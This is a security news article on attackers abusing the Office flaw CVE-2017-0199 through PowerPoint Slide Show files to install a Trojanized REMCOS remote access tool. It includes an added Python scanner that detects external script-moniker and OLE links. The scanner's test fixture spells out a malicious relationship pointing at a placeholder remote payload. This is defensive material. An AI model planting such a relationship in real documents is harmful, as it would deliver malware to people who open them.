CVE-2017-0199: Crooks exploit PowerPoint Slide Show files to deliver malware

According to Trend Micro, cyber criminals abuse the CVE-2017-0199 vulnerability to deliver malware via PowerPoint Slide Show.

In April Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild.

Hackers leveraged weaponized Rich Text File (RTF) documents exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

Now the same issue is being abused in a new way to infect computers with a remote access Trojan.

According to Trend Micro, the same flaw is abused to deliver malware via PowerPoint Slide Show.

“We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild before,” reads the analysis published by Trend Micro. “As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.”

The weaponized document is delivered as an attachment to spear-phishing messages that pretend to be sent by a business partner.

The email message is supposedly an order request, but it does not include any other business documents; instead, it carries a malicious PowerPoint Show (PPSX file) labelled as exploiting CVE-2017-8570. Experts believe the attackers actually leveraged CVE-2017-0199 and that the mislabelling is likely an error made by the toolkit developer.

Once the file has been opened, PowerPoint initializes the script moniker and launches the remote malicious payload through the PowerPoint Show animations feature, exploiting the Microsoft flaw patched in April. It then downloads a file called logo.doc, which is in fact an XML file containing JavaScript code.
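The artifact a defender can look for inside the PPSX itself is a slide relationship marked external whose target is a `script:` moniker pointing at a remote host. The scanner below is an added example, not code from the original article or from Trend Micro's analysis; the package it builds and the placeholder URL are constructed for the test, and plain `http(s)` hyperlinks are deliberately not flagged because they are normal in legitimate decks.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# A script:/mhtml: moniker as a relationship target is never legitimate in a deck.
SCRIPT_SCHEME = re.compile(r"^(script|mhtml):", re.IGNORECASE)
# A remote URL is only suspicious when it is the target of an OLE object link.
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def is_suspicious(rel_type, target, mode):
    """Flag external OLE links to remote hosts and any script:/mhtml: moniker."""
    if mode != "External":
        return False
    if SCRIPT_SCHEME.match(target):
        return True
    return rel_type.endswith("/oleObject") and bool(REMOTE_SCHEME.match(target))

def find_external_relationships(package_bytes):
    """Return (rels_path, short_type, target) for each suspicious relationship.
    Works on any OOXML package (.ppsx, .pptx, .docx) since all use .rels parts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                rel_type, target = rel.get("Type", ""), rel.get("Target", "")
                if is_suspicious(rel_type, target, rel.get("TargetMode")):
                    findings.append((name, rel_type.rsplit("/", 1)[-1], target))
    return findings

def build_sample_ppsx(slide_rels_xml):
    """Constructed minimal package for testing only; not a real PowerPoint file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()

# Constructed relationship parts: the first mimics the abuse described in the
# article (OLE object whose target is a remote script: moniker, placeholder host),
# the second is a benign deck with an ordinary web hyperlink.
OLE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
LINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MALICIOUS_RELS = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId2" Type="{OLE}" '
                  'Target="script:http://example.invalid/logo.doc" TargetMode="External"/></Relationships>')
BENIGN_RELS = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId2" Type="{LINK}" '
               'Target="https://example.com/" TargetMode="External"/></Relationships>')

if __name__ == "__main__":
    for path, short_type, target in find_external_relationships(build_sample_ppsx(MALICIOUS_RELS)):
        print(f"{path}: {short_type} -> {target}")
```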

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of the legitimate REMCOS remote access tool (RAT).

With this trick, attackers gain full access to the victim’s computer.

The tool leverages an unknown .NET protector to evade detection.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” reads the analysis published by Trend Micro.

Trend Micro pointed out the importance of keeping software up to date and of exercising extra caution when opening documents delivered via spam email or clicking embedded links.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.

Pierluigi Paganini
